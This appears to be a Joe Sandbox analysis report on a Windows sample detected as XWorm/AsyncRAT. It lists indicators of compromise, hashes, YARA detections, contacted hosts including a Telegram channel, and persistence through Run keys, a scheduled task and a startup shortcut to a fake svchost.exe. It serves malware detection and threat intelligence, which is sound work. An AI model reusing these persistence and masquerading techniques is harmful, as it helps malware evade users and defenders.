                                                                                                    http://www.bingmapsportal.comsvchost.exe, 00000005.00000002.1365183174.00000135A5613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                208.95.112.1
                                                                                                                		ip-api.comUnited States
                                                                                                                		53334TUT-ASUSfalse
                                                                                                                149.154.167.220
                                                                                                                		api.telegram.orgUnited Kingdom
                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                172.66.0.158
                                                                                                                		r2.hypixel.cfdUnited States
                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                104.198.168.179
                                                                                                                		unknownUnited States
                                                                                                                		15169GOOGLEUSfalse

                                                                                                                Private

                                                                                                                IP
                                                                                                                127.0.0.1

                                                                                                                General Information

                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1561587
                                                                                                                Start date and time:2024-11-23 21:02:08 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 8m 6s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:28
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:18sFhgSyVK.exe
                                                                                                                renamed because original name is a hash value
                                                                                                                Original Sample Name:22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.evad.winEXE@30/6@4/5
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 22.2%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 99%
                                                                                                                • Number of executed functions: 96
                                                                                                                • Number of non-executed functions: 19
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 40.81.94.65
                                                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target svchost.exe, PID 2324 because it is empty
                                                                                                                • Execution Graph export aborted for target svchost.exe, PID 5860 because it is empty
                                                                                                                • Execution Graph export aborted for target svchost.exe, PID 7208 because it is empty
                                                                                                                • Execution Graph export aborted for target svchost.exe, PID 7432 because it is empty
                                                                                                                • Execution Graph export aborted for target svchost.exe, PID 7588 because it is empty
                                                                                                                • Execution Graph export aborted for target svchost.exe, PID 7668 because it is empty
                                                                                                                • Execution Graph export aborted for target svchost.exe, PID 8136 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • VT rate limit hit for: 18sFhgSyVK.exe

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                15:03:12API Interceptor9513985x Sleep call for process: StartMenuExperienceHost.exe modified
                                                                                                                16:39:30API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                16:39:45API Interceptor8865x Sleep call for process: conhost.exe modified
                                                                                                                21:03:12Task SchedulerRun new task: svchost path: C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                21:03:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                21:03:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                22:38:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                208.95.112.1UH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                • ip-api.com/json/?fields=225545
                                                                                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • ip-api.com/json/
                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • ip-api.com/json/
                                                                                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • ip-api.com/json/
                                                                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                • ip-api.com/line/
                                                                                                                file.exeGet hashmaliciousJasonRATBrowse
                                                                                                                • ip-api.com/json/?fields=11827

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                ip-api.comUH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                                                                                • 208.95.112.1
                                                                                                                18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                • 208.95.112.1
                                                                                                                cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                • 208.95.112.1
                                                                                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 208.95.112.1
                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 208.95.112.1
                                                                                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 208.95.112.1
                                                                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                                                • 208.95.112.2
                                                                                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                • 208.95.112.1
                                                                                                                api.telegram.orgSystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousXWormBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                TELEGRAMRU21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                • 149.154.167.99
                                                                                                                SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousXWormBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                • 149.154.167.99
                                                                                                                CLOUDFLARENETUSkwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                • 104.20.22.46
                                                                                                                https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                                                                                • 104.17.25.14
                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                • 104.21.33.116
                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                • 172.64.41.3
                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 104.21.33.116
                                                                                                                cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                • 162.159.128.233
                                                                                                                http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                • 172.64.41.3
                                                                                                                https://elizgallery.com/nazvanie.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 104.22.0.204
                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 172.67.162.84
                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                • 172.67.162.84
                                                                                                                TUT-ASUSUH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                                                                                • 208.95.112.1
                                                                                                                18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                • 208.95.112.1
                                                                                                                cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                • 208.95.112.1
                                                                                                                z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 208.95.112.1
                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 208.95.112.1
                                                                                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 208.95.112.1
                                                                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 208.95.112.1
                                                                                                                http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                                                • 208.95.112.2
                                                                                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                • 208.95.112.1

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                74954a0c86284d0d6e1c4efefe92b521KEFttAEb.vbsGet hashmaliciousPureCrypterBrowse
                                                                                                                • 172.66.0.158
                                                                                                                hkQx7f6zzw.exeGet hashmaliciousTVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                hkQx7f6zzw.exeGet hashmaliciousTVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                reservation .exeGet hashmaliciousTVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                oZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                PkWnPA8l7C.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                oZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                                • 172.66.0.158
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ekwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                • 149.154.167.220
                                                                                                                psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                • 149.154.167.220
                                                                                                                SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                • 149.154.167.220
                                                                                                                17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                • 149.154.167.220

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):654
                                                                                                                Entropy (8bit):5.380476433908377
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\StartMenuExperienceHost.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):41
                                                                                                                Entropy (8bit):3.7195394315431693
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                                                MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                                                SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                                                SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                                                SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                                                Malicious:false
                                                                                                                Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                                                                                C:\Users\user\AppData\Local\Temp\svchost.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\StartMenuExperienceHost.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):79872
                                                                                                                Entropy (8bit):5.969526908188351
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:K2Kq6qxHg+vmlFB+dbPHq0FzvoqH7fgHOkVzQOCpG:LKIxHAFcdbPJHsHOvhG
                                                                                                                MD5:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                SHA1:EADD04F6DEF413C3987529AC88E5E69C89563852
                                                                                                                SHA-256:4C17F40A56758579CDC2356A9276F92CFA3ED2E56DBB89816E5EAA15CFF0E6F3
                                                                                                                SHA-512:FCAE7AE9D0EAB656CC37469A3AAB9B5A6C14FDE68EB3DD576F8BA8C7DC24FCAF7C8140C5D565E843FBD9A482F29D37A3093B7C95717924A4AA11F3B0704B7622
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.@g............................^M... ...`....@.. ....................................@..................................M..K....`............................................................................... ............... ..H............text...d-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................@M......H.......,h..........&.....................................................(....*.r...p*. W.R.*..(....*.r!..p*. ...*.s.........s.........s.........s.........*.rA..p*. ....*.ra..p*. /...*.r...p*. .O..*.r...p*. ..J.*.r...p*. ..'.*..((...*.r...p*. S...*.r...p*. ....*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(^...*"(....+.*"(....+.*&(7...&+.*.+5sl... .... .'..om...(,...~....-.(b...(T...~....on...&.-.*.r0..p*. ....*.rP..p*. ....*.rp..p*. 5...*.r...p*.rG..p*. ..e.*.r...p*. .(T.*.r

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Windows\StartMenuExperienceHost.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 19:03:11 2024, mtime=Sat Nov 23 19:03:12 2024, atime=Sat Nov 23 19:03:11 2024, length=79872, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1056
                                                                                                                Entropy (8bit):5.018080230260477
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:8H67Wl2Q2ncREgKpDw7APEV79pXJDJUwqygm:8IQ2ncRi0sPEVhdJDJmyg
                                                                                                                MD5:E25042DF17441038287CB1EA300C5AE6
                                                                                                                SHA1:3CCE5ECEF60D5A559161A717CCF95744674CCD40
                                                                                                                SHA-256:D41F990002825038FFEC485769BCF165235CDABD48A42B6A4CF86BAAD68B9A14
                                                                                                                SHA-512:1AA7A741E1F15D1F52D972F35F280648CC37A8F34CCA3FBEC05DAD165E933410C6DA551085D9AFE44F10CC35FE3A3C038CB3F56CC028129CD96174E806E5E676
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.... ....*%..=...x..=...*%..=...8........................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....w..=...Oj..=......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=wY`...........................3*N.A.p.p.D.a.t.a...B.P.1.....wY\...Local.<......EW.=wY`............................6c.L.o.c.a.l.....N.1.....wY`...Temp..:......EW.=wY`............................Z..T.e.m.p.....b.2..8..wYf. .svchost.exe.H......wYf.wYf...........................*.A.s.v.c.h.o.s.t...e.x.e.......`...............-......._............Y.d.....C:\Users\user\AppData\Local\Temp\svchost.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.s.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......571345...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS.

                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):2464
                                                                                                                Entropy (8bit):3.250685543696675
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:QOaqdmuF3rfNj+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVy:FaqdF7fp+AAHdKoqKFxcxkF1j
                                                                                                                MD5:F644E806C54C2BDD24A53CE4DDD029D0
                                                                                                                SHA1:B64483AC96E3EE4C669DE95F2BCAC0418EEADB1A
                                                                                                                SHA-256:9841815400D84B53D3B077395C1F0D898AEC1A6D26540C323F29906BB89942D8
                                                                                                                SHA-512:7307AF6DB2487645EB313CF83C48D38816528818158EDEF471318F1327F22ECF2688752FD05AC7C890C3124E198286F10460D0E128CF183BE73535D27CA344C0
                                                                                                                Malicious:false
